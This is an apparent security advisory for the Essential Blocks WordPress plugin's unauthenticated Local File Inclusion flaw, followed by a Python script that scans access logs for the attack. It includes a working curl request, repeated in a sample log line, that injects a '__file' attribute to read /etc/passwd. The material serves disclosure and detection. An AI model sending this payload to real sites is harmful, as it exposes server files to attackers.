Description

The plugin does not prevent unauthenticated attackers from overwriting local variables when rendering templates over the REST API, which may lead to Local File Inclusion attacks.
curl --url 'http://vulnerable-site.tld/wp-json/essential-blocks/v1/queries?block_type=nonexisting_block&query_data=%7B%22source%22%3A+%22post%22%7D&attributes=%7B%22__file%22%3A+%22%2Fetc%2Fpasswd%22%7D'
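
A log check for the request shape shown above, as an added example that is not part of the original advisory or the plugin's code: it scans access-log lines for calls to the queries route whose `attributes` JSON carries a key such as `__file`. Treating any key that starts with an underscore as suspicious is an assumption made here, and the log lines, IP addresses and the `example_block` value are constructed.

```python
import json
import re
from urllib.parse import urlsplit, parse_qs

ROUTE = "/wp-json/essential-blocks/v1/queries"
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_attributes(target):
    """Return the `attributes` keys in a request target that could shadow
    template-local variables (assumption: any key starting with "_")."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != ROUTE:
        return []
    hits = []
    for raw in parse_qs(parts.query).get("attributes", []):
        try:
            attrs = json.loads(raw)
        except ValueError:
            continue  # not JSON, nothing to inspect
        if isinstance(attrs, dict):
            hits += [k for k in attrs if k.startswith("_")]
    return hits


def scan(lines):
    """Yield (client_ip, keys) for each log line with flagged keys."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        keys = suspicious_attributes(m.group(1))
        if keys:
            yield line.split(" ", 1)[0], keys


# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-json/essential-blocks/v1/queries?block_type=nonexisting_block&query_data=%7B%22source%22%3A+%22post%22%7D&attributes=%7B%22__file%22%3A+%22%2Fetc%2Fpasswd%22%7D HTTP/1.1" 200 1024',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-json/essential-blocks/v1/queries?block_type=example_block&query_data=%7B%22source%22%3A+%22post%22%7D&attributes=%7B%22columns%22%3A+3%7D HTTP/1.1" 200 2048',
    '198.51.100.4 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, keys in scan(SAMPLE_LOG):
        print(ip, keys)
```

WordPress also serves REST routes through the `?rest_route=` query parameter, and parameters sent in a request body do not appear in access logs; this check covers only the `/wp-json/` query-string form shown in the curl command.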